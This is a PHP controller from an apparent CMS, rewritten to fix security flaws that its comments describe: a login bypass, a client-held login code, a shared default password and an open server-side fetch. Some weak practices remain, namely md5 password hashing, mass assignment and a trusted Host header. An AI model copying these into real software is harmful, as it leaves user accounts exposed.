<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2020-08-10 http://myucms.com All rights reserved.
// +----------------------------------------------------------------------
// | Author: 梦雨 <50361804@qq.com>
// +----------------------------------------------------------------------
namespace app\index\controller;
use think\Controller;
use think\Db;
// Called at file-load time, before the class below is declared (a side effect
// mixed into a declaration file). What open_ts() enables is not visible here —
// project helper, confirm its effect before relying on it.
open_ts();
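/**
 * Front-end API controller: admin content update, e-mail one-time-code
 * login/registration, logout and bookmark ("收藏") toggling.
 *
 * Relies on project-wide helpers that are not defined in this file:
 * admin(), _post(), get(), input(), user(), cookie(), session(), set(),
 * send_mail(), preg(), p_id(), Query(), http() and json(). Their exact
 * contracts are assumed from how the original code used them.
 *
 * Requires PHP >= 7.1 (random_int/random_bytes, private constants, nullable
 * return types).
 */
class Api extends Controller
{
    /** Lifetime of an e-mail login code, in seconds. */
    private const CODE_TTL = 300;

    /** Maximum number of accounts that may be auto-registered from one IP. */
    private const MAX_ACCOUNTS_PER_IP = 5;

    /** Lifetime of the `uid` cookie set on login (value kept from the original). */
    private const LOGIN_COOKIE_TTL = 315360000;

    /**
     * Whether the current visitor is logged in.
     *
     * The original test was `cookie('uid') == user('uid')`. With loose
     * comparison an empty/absent cookie compares equal to an empty or false
     * user lookup, so an anonymous visitor could pass as logged in. Both
     * sides are cast to string and an empty cookie never counts.
     */
    private function isLoggedIn(): bool
    {
        $cookieUid = (string) cookie('uid');

        return $cookieUid !== '' && $cookieUid === (string) user('uid');
    }

    /**
     * The login code issued in this session, or null when none is pending
     * or it has expired.
     */
    private function pendingCode(): ?string
    {
        $code = session('code');
        $expire = (int) session('code_expire');
        if ($code === null || $code === '' || $expire < time()) {
            return null;
        }

        return (string) $code;
    }

    /**
     * True when $path is a site-relative path: non-empty, begins with a
     * single "/" (so it cannot introduce a new authority when appended to a
     * host), and carries no control characters.
     */
    private function isLocalPath(string $path): bool
    {
        if ($path === '' || $path[0] !== '/' || substr($path, 0, 2) === '//') {
            return false;
        }
        if (preg_match('/[\x00-\x1F\x7F]/', $path)) {
            return false;
        }
        $parts = parse_url($path);
        if ($parts === false) {
            return false;
        }
        foreach (['scheme', 'host', 'port', 'user', 'pass'] as $component) {
            if (isset($parts[$component])) {
                return false;
            }
        }

        return true;
    }

    /**
     * Code update (admin only): writes the posted fields to row `id` of the
     * table named by `model`.
     *
     * admin() is expected to stop the request for non-administrators.
     */
    public function codeUpdate()
    {
        admin();
        if (!_post()) {
            return;
        }
        // The target table name comes from the request. Restrict it to a
        // plain identifier so it cannot carry quoting or separators. A fixed
        // allow-list of editable tables would be stricter — TODO confirm
        // which tables this endpoint is meant to edit.
        $model = (string) input('model');
        if (!preg_match('/^[A-Za-z0-9_]+$/', $model)) {
            $this->error('更新失败');
        }
        // NOTE(review): every posted field is written as-is (mass assignment);
        // only an administrator is expected to reach this point.
        $data = input('post.');
        $data['times'] = time();
        // addslashes() on top of a parameterised update was in the original;
        // kept because the display side may expect it — confirm.
        $data['content'] = addslashes(preg(input('content')));
        if (Db::name($model)->where(['id' => input('id')])->update($data)) {
            $this->success('更新成功');
        } else {
            $this->error('更新失败');
        }
    }

    /**
     * Send a login verification code to the given e-mail address.
     *
     * The code is kept server-side in the session together with its expiry.
     * The original stored it in a plain `code` cookie, which hands the secret
     * to the client and lets the client present any value at verification.
     */
    public function code()
    {
        if ($this->isLoggedIn()) {
            $this->success('已登录');
        }
        $mail = get('mail');
        if (!filter_var($mail, FILTER_VALIDATE_EMAIL)) {
            $this->error('邮箱不正确');
        }
        // Refuse to issue a new code while the previous one is still valid.
        if ($this->pendingCode() !== null) {
            $this->error('验证码未过期');
        }
        // The code is a secret: draw it from the CSPRNG, not mt_rand().
        $code = (string) random_int(100000, 999999);
        $subject = '【'.set('title').'】账号登录验证';
        $body = '来自【'.set('title').'】的账号登录,验证码'.$code.'五分钟内有效';
        if (send_mail($mail, $subject, $body)) {
            session('code', $code);
            session('code_expire', time() + self::CODE_TTL);
            session('mail', $mail);
            $this->success('发送成功');
        } else {
            $this->error('发送失败');
        }
    }

    /**
     * Log in with an e-mail address and the code sent by code(); unknown
     * addresses are registered on the spot.
     *
     * Returns a json() response on the registration path; the login path
     * ends through $this->success()/error().
     */
    public function login()
    {
        if ($this->isLoggedIn()) {
            $this->success('已登录');
        }
        if (!_post()) {
            return;
        }
        $rawMail = (string) get('mail');
        if (!filter_var($rawMail, FILTER_VALIDATE_EMAIL)) {
            $this->error('邮箱不正确');
        }
        $pending = $this->pendingCode();
        $given = (string) get('code');
        // Constant-time comparison of the one-time code; the address must be
        // the one the code was sent to.
        if ($pending === null || !hash_equals($pending, $given) || session('mail') !== $rawMail) {
            $this->error('验证码不正确');
        }
        // The code is single-use.
        session('code', null);
        session('code_expire', null);

        // Addresses are stored lower-cased at registration, so look up the
        // same form.
        $mail = strtolower($rawMail);
        $user = Db::name('user')->where(['mail' => $mail])->find();
        if ($user !== null && isset($user['mail']) && strtolower((string) $user['mail']) === $mail) {
            // Login.
            cookie('uid', $user['uid'], self::LOGIN_COOKIE_TTL);
            $this->success('登录成功');
        } else {
            // Register. Rate-limit by source IP before doing anything else.
            $ip = $_SERVER['REMOTE_ADDR'];
            $fromThisIp = Db::name('user')->where(['ip' => $ip])->count();
            if ($fromThisIp >= self::MAX_ACCOUNTS_PER_IP) {
                return json(['code' => 0, 'msg' => '注册频繁']);
            }
            $data = [
                'ip'       => $ip,
                'mail'     => $mail,
                // The original stored md5(123456) — a well-known default that
                // anyone could use to log in to every mail-registered account.
                // Store the hash of an unguessable random value instead, in the
                // same md5 form the original used; the user must set a password
                // through whatever reset flow the project provides.
                'password' => md5(bin2hex(random_bytes(32))),
                'time'     => time(),
                'open'     => 1,
                'uid'      => p_id(64),
                'name'     => '用户'.mt_rand(100000, 9999999999999),
            ];
            // The original chained where($data) before insert(); a where
            // clause has no effect on an insert, so it is dropped.
            if (Db::name('user')->insert($data)) {
                cookie('uid', $data['uid']);

                return json(['code' => 1, 'msg' => '注册成功']);
            }

            return json(['code' => 0, 'msg' => '注册失败']);
        }
    }

    /** Log out: clears the session user id and the `uid` cookie. */
    public function out()
    {
        session('userid', null);
        cookie('uid', null);

        return json(['code' => 1, 'msg' => '退出成功']);
    }

    /**
     * Toggle a bookmark of the site path given in `data` for the current
     * user: remove it when it exists, otherwise fetch the page title and
     * store it.
     */
    public function shoucang()
    {
        if (!$this->isLoggedIn()) {
            $this->error('请先登录');
        }
        // NOTE(review): bookmarks are keyed by user('id') while the login
        // checks use user('uid'); confirm the two are meant to differ.
        $uid = user('id');
        $path = (string) get('data');
        // `data` is appended to this host to form a URL the server then
        // fetches. Only accept a site-local path so the fetch cannot be
        // pointed at another host.
        if (!$this->isLocalPath($path)) {
            $this->error('收藏失败');
        }
        $where = ['url' => $path, 'uid' => $uid];
        if (Db::name('shoucang')->where($where)->count() > 0) {
            if (Db::name('shoucang')->where($where)->delete()) {
                $this->success('取消收藏成功');
            } else {
                $this->error('取消收藏失败');
            }

            return;
        }
        $data = [
            'open'  => 1,
            'time'  => time(),
            'url'   => $path,
            'uid'   => $uid,
            // NOTE(review): HTTP_HOST is taken from the request; if the server
            // answers for any Host header, a configured site host would be the
            // safer base for this fetch.
            'title' => Query(http().$_SERVER['HTTP_HOST'].$path, 'title', 'text'),
        ];
        if (Db::name('shoucang')->insert($data)) {
            $this->success('收藏成功');
        } else {
            $this->error('收藏失败');
        }
    }
}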